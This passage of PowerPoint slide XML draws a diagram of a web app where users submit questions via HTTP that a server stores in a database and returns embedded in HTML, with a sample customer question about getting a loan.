          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="object 71"/>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72" name="object 72"/>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73" name="object 73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992725" y="3141071"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="744543" y="2355803"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="74" name="object 74"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId19" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1379219" y="2369807"/>
              <a:ext cx="460235" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="object 75"/>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76" name="object 76"/>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77" name="object 77"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId20" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="744543" y="2355803"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="object 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273725" y="3603749"/>
            <a:ext cx="1148080"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79" name="object 79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="837183" y="3387337"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="627887" y="2540502"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="80" name="object 80"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId21" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="627887" y="2540502"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="81" name="object 81"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId22" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="673114" y="2563418"/>
              <a:ext cx="277416" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="object 82"/>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83" name="object 83"/>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84" name="object 84"/>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85" name="object 85"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="77385" y="3050012"/>
            <a:ext cx="3352800" cy="3749040"/>
            <a:chOff x="58039" y="2287509"/>
            <a:chExt cx="2514600" cy="2811780"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="86" name="object 86"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId23" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275823" y="2287509"/>
              <a:ext cx="111252" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="87" name="object 87"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId24" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="317155" y="2295348"/>
              <a:ext cx="176944" cy="85037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="88" name="object 88"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId25" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="70663" y="3397237"/>
              <a:ext cx="2495100" cy="1694159"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="89" name="object 89"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="62801" y="3390544"/>
              <a:ext cx="2505075" cy="1703705"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2505075" h="1703704">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2504630" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2504630" y="1703679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1703679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="object 90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9069357" y="3886711"/>
            <a:ext cx="2713567" cy="1125094"/>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7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>User asks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-520"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91" name="object 91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9069356" y="4992120"/>
            <a:ext cx="2841413" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a loan?”)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="object 92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9685260" y="2090779"/>
            <a:ext cx="390313" cy="243721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>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93" name="object 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63625" y="3662791"/>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94" name="object 94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778587" y="2538306"/>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13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Associate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7"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sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="object 95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732049" y="3166500"/>
            <a:ext cx="153924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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>retrieves </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>all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13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="object 96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864186" y="5078205"/>
            <a:ext cx="2220807" cy="1125094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="just">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>returns </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>embedded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="object 97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90085" y="5409232"/>
            <a:ext cx="3327400" cy="659390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="121070">
              <a:lnSpc>
                <a:spcPts val="2480"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Customer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-107" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>5:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="283626">
              <a:lnSpc>
                <a:spcPts val="2480"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“How </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>loan?”</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="98" name="object 98"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="34544" y="5065471"/>
            <a:ext cx="3448473" cy="1728047"/>
            <a:chOff x="25907" y="3799103"/>
            <a:chExt cx="2586355" cy="1296035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="99" name="object 99"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId26" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="166032" y="3804434"/>
              <a:ext cx="990488" cy="149570"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="object 100"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="311372" y="3807002"/>
              <a:ext cx="298450" cy="145415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="298450" h="145414">
                  <a:moveTo>
                    <a:pt x="20421" y="27571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="88963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40970" y="88963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20535" y="27571"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="298450" h="145414">
                  <a:moveTo>
                    <a:pt x="221068" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="293179" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293839" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294436" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294957" y="558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295478" y="927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295922" y="1574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297421" y="9372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297421" y="11607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297421" y="13690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294957" y="22377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294436" y="22783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293839" y="22986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293179" y="22986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="22986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="58267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285254" y="58267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285915" y="58267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286537" y="58470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287096" y="58877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287655" y="59283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289318" y="64236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289509" y="65684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289598" y="67449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289598" y="69545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289598" y="71691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289509" y="73482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289318" y="74891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289140" y="76314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287096" y="80136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286537" y="80517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285915" y="80695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285254" y="80695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="80695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="121437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293623" y="121437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294297" y="121437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297980" y="130784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297980" y="132943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297980" y="135102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294297" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293623" y="144437"/>
                  </a:lnTo>
